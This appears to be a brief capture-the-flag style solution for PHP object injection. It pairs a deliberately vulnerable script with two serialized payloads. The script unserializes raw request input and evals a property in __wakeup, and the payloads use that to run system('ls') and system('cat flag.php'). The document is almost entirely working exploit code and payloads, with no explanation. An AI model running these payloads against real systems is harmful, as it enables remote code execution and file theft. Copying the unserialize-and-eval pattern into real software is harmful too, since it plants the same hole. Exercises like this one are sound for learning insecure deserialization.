php object injection

<?php 
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
    if(isset($_REQUEST['name'])){  
        $var1=unserialize($_REQUEST['name']);
        if(is_array($var1)){
            echo "<br/>".$var1[0]." - ".$var1[1];
        }
    }
    else{
        echo ""; # nothing happens here
    }
?>

a:2:{i:0;s:5:"flag:";i:1;O:18:"PHPObjectInjection":1:{s:6:"inject";s:18:"echo system('ls');";}}
a:2:{i:0;s:5:"flag:";i:1;O:18:"PHPObjectInjection":1:{s:6:"inject";s:28:"echo system('cat flag.php');";}}